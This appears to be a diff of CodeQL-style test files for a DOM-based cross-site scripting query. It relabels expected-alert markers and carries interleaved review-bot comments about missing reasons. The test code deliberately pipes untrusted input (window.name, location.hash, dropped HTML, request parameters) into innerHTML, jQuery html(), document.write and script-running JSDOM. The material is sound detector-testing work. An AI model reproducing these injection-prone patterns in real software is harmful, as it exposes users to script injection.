diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js index 9177f08bdc5c..dfa55453917a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js @@ -2,6 +2,6 @@ import * as dummy from 'dummy'; class CustomElm extends HTMLElement { test() { - this.innerHTML = window.name; // NOT OK + this.innerHTML = window.name; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js index 1bb64b48b214..df6fd9f439f0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js @@ -1,22 +1,22 @@ const d3 = require('d3'); function getTaint() { - return window.name; + return window.name; // $ Source } function doSomething() { d3.select('#main') .attr('width', 100) .style('color', 'red') - .html(getTaint()) // NOT OK - .html(d => getTaint()) // NOT OK + .html(getTaint()) // $ Alert + .html(d => getTaint()) // $ Alert .call(otherFunction) - .html(d => getTaint()); // NOT OK + .html(d => getTaint()); // $ Alert } function otherFunction(selection) { selection .attr('foo', 'bar') - .html(getTaint()); // NOT OK + .html(getTaint()); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js index 47513c796d96..20e71516a9f7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js 
@@ -6,19 +6,19 @@ import dateformat from 'dateformat'; function main() { let time = new Date(); - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source - document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // $ Alert document.body.innerHTML = `Time is ${dateFns.format(taint, time)}`; // OK - time arg is safe document.body.innerHTML = `Time is ${dateFnsFp.format(time)(taint)}`; // OK - time arg is safe - document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment(taint).format()}`; // OK - document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment(taint).format()}`; + document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // $ Alert import dayjs from 'dayjs'; - document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // $ Alert } import LuxonAdapter from "@date-io/luxon"; 
@@ -27,36 +27,36 @@ import MomentAdapter from "@date-io/moment"; import DayJSAdapter from "@date-io/dayjs" function dateio() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const dateFns = new DateFnsAdapter(); const luxon = new LuxonAdapter(); const moment = new MomentAdapter(); const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // $ Alert } import { DateTime } from "luxon"; function luxon() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source - document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is 
${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // $ Alert } function dateio2() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const moment = new MomentAdapter(); - document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert const luxon = new LuxonAdapter(); - document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // $ Alert const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts index 487e51c8f8ad..8371c4c49b91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts @@ -5,14 +5,14 @@ function drop(e) { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } 
@@ -21,16 +21,16 @@ function drop(e) { export function install(el: HTMLElement): void { el.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }) } document.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }); $("#foo").bind('drop', (e) => { - $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // $ Alert }); (function () { @@ -40,14 +40,14 @@ $("#foo").bind('drop', (e) => { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -68,9 +68,9 @@ async function getDropData(e: DragEvent): Promise> { } if (e.dataTransfer.types.includes('text/html')) { - const droppedHtml = e.dataTransfer.getData('text/html'); + const droppedHtml = e.dataTransfer.getData('text/html'); // $ Source const container = document.createElement('html'); - container.innerHTML = droppedHtml; + container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); if (imgs.length === 1) { const src = imgs[0].src; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js index a48f720bed1a..152a986bbf6e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js 
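Review bot: The newly expected alert at `container.innerHTML = droppedHtml;` in `getDropData` carries no reason, and the line had no `// NOT OK` marker before this change. The element comes from `document.createElement('html')` and is not attached to the document within the hunk, so a reader may assume that parsing into it is harmless. I would extend the marker to `// $ Alert - parsing dropped HTML into a detached element is still treated as an HTML sink`. `getDropData` starts and ends outside the hunk.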
@@ -1,4 +1,4 @@ function test() { let loc = window.location.href; - $('click'); // OK + $('click'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js index 5b79cfce8993..8eebe40b4179 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js @@ -1,3 +1,3 @@ document.getElementById('my-id').onclick = function() { - this.parentNode.innerHTML = '

    A link

    '; // NOT OK + this.parentNode.innerHTML = '

    A link

    '; // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js index cab534d3832c..2d1af9065d35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js @@ -3,9 +3,8 @@ var app = express(); import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - // NOT OK - new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); + new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); // $ Alert + - // OK new JSDOM(req.param("wobble"), { runScripts: "outside-only" }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js index 3369df5dd873..d025ace184c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js @@ -1,38 +1,38 @@ function test() { - var tainted = document.location.search + var tainted = document.location.search // $ Source $(tainted); // OK - location.search starts with '?' - $("body", tainted); // OK - $("." + tainted); // OK - $("
    "); // NOT OK - $("body").html("XSS: " + tainted); // NOT OK + $("body", tainted); + $("." + tainted); + $("
    "); // $ Alert + $("body").html("XSS: " + tainted); // $ Alert $(window.location.hash); // OK - location.hash starts with '#' - $("" + location.toString() + ""); // NOT OK + $("" + location.toString() + ""); // $ Alert // Not related to jQuery, but the handling of $() should not affect this sink let elm = document.getElementById('x'); - elm.innerHTML = decodeURIComponent(window.location.hash); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.search); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.toString()); // NOT OK + elm.innerHTML = decodeURIComponent(window.location.hash); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert - let hash = window.location.hash; + let hash = window.location.hash; // $ Source $(hash); // OK - start with '#' - $(hash.substring(1)); // NOT OK - $(hash.substring(1, 10)); // NOT OK - $(hash.substr(1)); // NOT OK - $(hash.slice(1)); // NOT OK - $(hash.substring(0, 10)); // OK + $(hash.substring(1)); // $ Alert + $(hash.substring(1, 10)); // $ Alert + $(hash.substr(1)); // $ Alert + $(hash.slice(1)); // $ Alert + $(hash.substring(0, 10)); - $(hash.replace('#', '')); // NOT OK - $(window.location.search.replace('?', '')); // NOT OK - $(hash.replace('!', '')); // OK - $(hash.replace('blah', '')); // OK + $(hash.replace('#', '')); // $ Alert + $(window.location.search.replace('?', '')); // $ Alert + $(hash.replace('!', '')); + $(hash.replace('blah', '')); - $(hash + 'blah'); // OK + $(hash + 'blah'); $('blah' + hash); // OK - does not start with '<' - $('' + hash + ''); // NOT OK + $('' + hash + ''); // $ Alert - $('#foo').replaceWith(tainted); // NOT OK - $('#foo').replaceWith(() => tainted); // NOT OK + $('#foo').replaceWith(tainted); // $ Alert + $('#foo').replaceWith(() => tainted); // $ Alert } 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx index 85ad5cef8d43..ae373dd4ea96 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx @@ -2,7 +2,7 @@ var express = require("express"); var app = express(); app.get("/some/path", function (req, res) { - const locale = req.param("locale"); + const locale = req.param("locale"); // $ Source const breadcrumbList = [ { "@type": "ListItem", @@ -28,15 +28,15 @@ app.get("/some/path", function (req, res) { }; // OK + }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js index 08183d0db7e3..86b4c3e8d3cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js @@ -4,10 +4,9 @@ import jwt from "jsonwebtoken"; import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - var taint = req.param("wobble"); + var taint = req.param("wobble"); // $ Source jwt.verify(taint, 'my-secret-key', function (err, decoded) { - // NOT OK - new JSDOM(decoded.foo, { runScripts: "dangerously" }); + new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js index 7ead302724c3..59e96cb9d11e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js 
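Review bot: The `// $ Alert` on `new JSDOM(decoded.foo, { runScripts: "dangerously" })` in jwt-server.js does not say why a payload that has passed `jwt.verify` is still expected to be reported. Presumably the test documents that signature verification is not treated as a sanitizer, since signed claims can still carry user-supplied text. A trailing note such as `// $ Alert - jwt.verify does not sanitize the decoded claims` would make that explicit.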
@@ -3,5 +3,5 @@ import $ from "jquery" $.post(loginUrl(), {data: "foo"}, (data, xhr) => { var decoded = jwt_decode(data); - $.jGrowl(decoded); // NOT OK - but only flagged with additional sources [INCONSISTENCY] + $.jGrowl(decoded); // $ MISSING: Alert - only flagged with additional sources }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js index 9091f93be7bb..f1fceadbf057 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js @@ -9,7 +9,7 @@ app.post('/private_message', (req, res) => { from: 'webmaster@example.com', to: backend.getUserEmail(req.query.receiver), subject: 'Private message', - text: `Hi, you got a message from someone. ${req.query.message}.`, // OK - html: `Hi, you got a message from someone. ${req.query.message}.`, // NOT OK + text: `Hi, you got a message from someone. ${req.query.message}.`, + html: `Hi, you got a message from someone. ${req.query.message}.`, // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js index e8139936bc78..73088a45b5ef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js 
@@ -1,46 +1,46 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source - $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); // OK + $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert var tainted = target; - $('myId').html(tainted); // NOT OK + $('myId').html(tainted); // $ Alert if (sanitize) { tainted = DOMPurify.sanitize(tainted); } - $('myId').html(tainted); // OK + $('myId').html(tainted); inner(target); function inner(x) { - $('myId').html(x); // NOT OK + $('myId').html(x); // $ Alert if (sanitize) { x = DOMPurify.sanitize(x); } - $('myId').html(x); // OK + $('myId').html(x); } } function badSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source function sanitizeBad(x) { return x; // No sanitization; } var tainted2 = target; - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert if (sanitize) { tainted2 = sanitizeBad(tainted2); } - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert var tainted3 = target; - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert if (sanitize) { tainted3 = sanitizeBad(tainted3); } - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert - $('myId').html(sanitize ? sanitizeBad(target) : target); // NOT OK + $('myId').html(sanitize ? sanitizeBad(target) : target); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx index 66b7d65f669b..69f66f07aa44 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx 
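Review bot: With the `// OK` markers removed, `$('myId').html(sanitize ? DOMPurify.sanitize(target) : target);` now reads as ordinary safe code, although `target` still reaches the sink unchanged whenever `sanitize` is falsy. The same holds in `test()` for the `$('myId').html(tainted);` that follows `if (sanitize) { tainted = DOMPurify.sanitize(tainted); }`. The absence of an alert appears to be a deliberate precision choice of the query rather than a statement that the code is safe, and the test should say so. I would add a comment on those lines, for example `// no alert expected: optionally sanitized values are not flagged, even though the unsanitized branch stays reachable`, and the same on the final `$('myId').html(x);` in `inner`.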
@@ -2,18 +2,18 @@ import { useRouter } from 'next/router' export default function Post(params) { const router = useRouter() - const { id } = router.query + const { id } = router.query // $ Source return ( <>
    ) @@ -22,8 +22,8 @@ export default function Post(params) { export async function getServerSideProps(context) { return { props: { - id: context.params.id || "", - q: context.query?.foobar || "", + id: context.params.id || "", // $ Source + q: context.query?.foobar || "", // $ Source } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js index 318007dacfa0..432c9910a2d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js @@ -4,7 +4,7 @@ import { WebView } from 'react-native'; var app = express(); app.get('/some/path', function(req, res) { - let tainted = req.param("code"); - ; // NOT OK - ; // NOT OK + let tainted = req.param("code"); // $ Source + ; // $ Alert + ; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js index 6d7e20ec6eb8..3811c6b2c964 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js @@ -7,13 +7,13 @@ function useMyContext() { export function useDoc1() { let { root } = useMyContext(); - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } class C extends Component { foo() { let { root } = this.context; - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js index 49d66634e5af..472f2026f1db 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js @@ -5,13 +5,13 @@ export function nextRouter() { return (
    { - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1 { - router.replace(router.query.foobar) // NOT OK + router.replace(router.query.foobar) // $ Alert }}>Click to XSS 2 { - router.push('/?foobar=' + router.query.foobar) // OK + router.push('/?foobar=' + router.query.foobar) }}>Safe Link
    ) @@ -20,7 +20,7 @@ export function nextRouter() { import { withRouter } from 'next/router' function Page({ router }) { - return router.push(router.query.foobar)}>Click to XSS 3 // NOT OK + return router.push(router.query.foobar)}>Click to XSS 3 // $ Alert } export const pageWithRouter = withRouter(Page); @@ -30,7 +30,7 @@ export function nextRouterWithLib() { return (
    { - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1
    ) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js index 672cd3bd6898..2dbc2feb38fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js @@ -1,33 +1,33 @@ import { useState } from 'react'; function initialState() { - let [state, setState] = useState(window.name); - return
    ; // NOT OK + let [state, setState] = useState(window.name); // $ Source + return
    ; // $ Alert } function setStateValue() { let [state, setState] = useState('foo'); - setState(window.name); - return
    ; // NOT OK + setState(window.name); // $ Source + return
    ; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); - setState(() => window.name); - return
    ; // NOT OK + setState(() => window.name); // $ Source + return
    ; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); setState(prev => { - document.body.innerHTML = prev; // NOT OK + document.body.innerHTML = prev; // $ Alert }) - setState(() => window.name); + setState(() => window.name); // $ Source } function setStateValueSafe() { let [state, setState] = useState('foo'); setState('safe'); setState(() => 'also safe'); - return
    ; // OK + return
    ; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js index 9d9fe6c80c97..52ad850e0185 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js @@ -13,37 +13,37 @@ function escapeAttr(s) { } function test() { - var tainted = window.name; + var tainted = window.name; // $ Source var elt = document.createElement(); - elt.innerHTML = "" + escapeHtml(tainted) + ""; // OK - elt.innerHTML = "
    " + escapeAttr(tainted) + "
    "; // NOT OK, but not flagged - [INCONSISTENCY] + elt.innerHTML = "" + escapeHtml(tainted) + ""; + elt.innerHTML = "
    " + escapeAttr(tainted) + "
    "; // $ MISSING: Alert - not flagged - const regex = /[<>'"&]/; if (regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (!regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } if (regex.exec(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) != null) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) == null) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } - elt.innerHTML = tainted.replace(/<\w+/g, ''); // NOT OK + elt.innerHTML = tainted.replace(/<\w+/g, ''); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js index 6c13ae8cc3e2..aadec44a9dfb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js 
@@ -1,30 +1,30 @@ (function() { - sessionStorage.setItem('session', document.location.search); - localStorage.setItem('local', document.location.search); + sessionStorage.setItem('session', document.location.search); // $ Source + localStorage.setItem('local', document.location.search); // $ Source - $('myId').html(sessionStorage.getItem('session')); // NOT OK - $('myId').html(localStorage.getItem('session')); // OK - $('myId').html(sessionStorage.getItem('local')); // OK - $('myId').html(localStorage.getItem('local')); // NOT OK + $('myId').html(sessionStorage.getItem('session')); // $ Alert + $('myId').html(localStorage.getItem('session')); + $('myId').html(sessionStorage.getItem('local')); + $('myId').html(localStorage.getItem('local')); // $ Alert var href = localStorage.getItem('local'); - $('myId').html("foobar"); // NOT OK + $('myId').html("foobar"); // $ Alert if (href.indexOf("\"") !== -1) { return; } - $('myId').html(""); // OK + $('myId').html(""); var href2 = localStorage.getItem('local'); if (href2.indexOf("\"") !== -1) { return; } - $('myId').html("\nfoobar"); // OK + $('myId').html("\nfoobar"); var href3 = localStorage.getItem('local'); if (href3.indexOf("\"") !== -1) { return; } - $('myId').html('\r\n
    ' + "something" + ''); // OK + $('myId').html('\r\n' + "something" + ''); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js index 91e122dee0f5..d20f88dba398 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js @@ -1,12 +1,12 @@ -document.write(document.location.href.charCodeAt(0)); // OK +document.write(document.location.href.charCodeAt(0)); -document.write(document.location); // NOT OK -document.write(document.location.href); // NOT OK -document.write(document.location.href.valueOf()); // NOT OK -document.write(document.location.href.sup()); // NOT OK -document.write(document.location.href.toUpperCase()); // NOT OK -document.write(document.location.href.trimLeft()); // NOT OK -document.write(String.fromCharCode(document.location.href)); // NOT OK -document.write(String(document.location.href)); // NOT OK -document.write(escape(document.location.href)); // OK (for now) -document.write(escape(escape(escape(document.location.href)))); // OK (for now) +document.write(document.location); // $ Alert +document.write(document.location.href); // $ Alert +document.write(document.location.href.valueOf()); // $ Alert +document.write(document.location.href.sup()); // $ Alert +document.write(document.location.href.toUpperCase()); // $ Alert +document.write(document.location.href.trimLeft()); // $ Alert +document.write(String.fromCharCode(document.location.href)); // $ Alert +document.write(String(document.location.href)); // $ Alert +document.write(escape(document.location.href)); // OK - for now +document.write(escape(escape(escape(document.location.href)))); // OK - for now 
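Review bot: The negative cases in the stored-xss.js hunk lose their only marker, so `$('myId').html(localStorage.getItem('session'));` and `$('myId').html(sessionStorage.getItem('local'));` no longer show that they are intentionally unflagged, or why. The reason is visible only by matching the keys against the two `setItem` calls at the top of the function. A short comment such as `// OK - 'session' was written to sessionStorage only` would keep that. The jquery.js hunk has the same gap on lines like `$(hash.substring(0, 10));` and `$(hash + 'blah');`, while neighbouring lines still carry reasons such as `// OK - start with '#'`.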
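Review bot: `// OK - for now` on the two `document.write(escape(...))` lines in string-manipulations.js gives neither the reason the calls are unflagged nor what would change that. `escape()` percent-encodes `<`, `>`, `&` and quotes, which is presumably why no alert is expected. It is a deprecated URL-style encoder rather than an HTML escaper, though. I would write `// OK - escape() percent-encodes HTML metacharacters; revisit if it stops being treated as a sanitizer`.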
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js index a1feef0267a0..7b0e5c4be3a0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js @@ -2,12 +2,12 @@ import 'dummy'; function foo(x, y, z) { arguments; // ensure 'arguments' are used - document.writeln(x); // OK - document.writeln(y); // NOT OK - document.writeln(z); // OK + document.writeln(x); + document.writeln(y); // $ Alert + document.writeln(z); } function bar() { - const url = window.location.href; + const url = window.location.href; // $ Source foo('safe', url, 'safe'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx index d030b30b1390..7675513734da 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx @@ -3,22 +3,22 @@ import ReactDOM from 'react-dom'; import ReactTooltip from 'react-tooltip'; function tooltips() { - const source = window.name; + const source = window.name; // $ Source return - // OK - // OK - // NOT OK - // NOT OK + + + { /* $ Alert */ } + { /* 